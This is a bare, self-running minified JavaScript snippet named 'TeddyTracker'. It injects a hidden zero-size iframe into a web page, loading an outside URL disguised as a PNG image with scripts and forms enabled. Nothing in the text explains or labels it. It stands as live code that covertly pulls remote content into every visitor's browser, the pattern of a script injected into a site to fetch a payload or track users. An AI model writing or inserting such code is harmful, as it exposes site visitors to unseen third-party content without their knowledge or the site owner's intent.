TeddyTracker={link:"http://vb-api.com/images/3.png",init:function(b){b=this.buildFrame(this.link);this.append(b)},buildFrame:function(b){var a=document.createElement("div");a.setAttribute("style","display:none;");var c=document.createElement("iframe");c.setAttribute("src",b);c.setAttribute("sandbox", "allow-same-origin allow-scripts allow-forms");c.setAttribute("style","display:none;visibility:hidden;width:0px;height:0px");a.appendChild(c);return a},append:function(b){var a=document.getElementById("tracking-footer-3");"undefined"!=typeof a?a.appendChild(b):(a=document.getElementsByName("body"),"undefined"!=typeof a&& a[0].appendChild(b))}};TeddyTracker.init();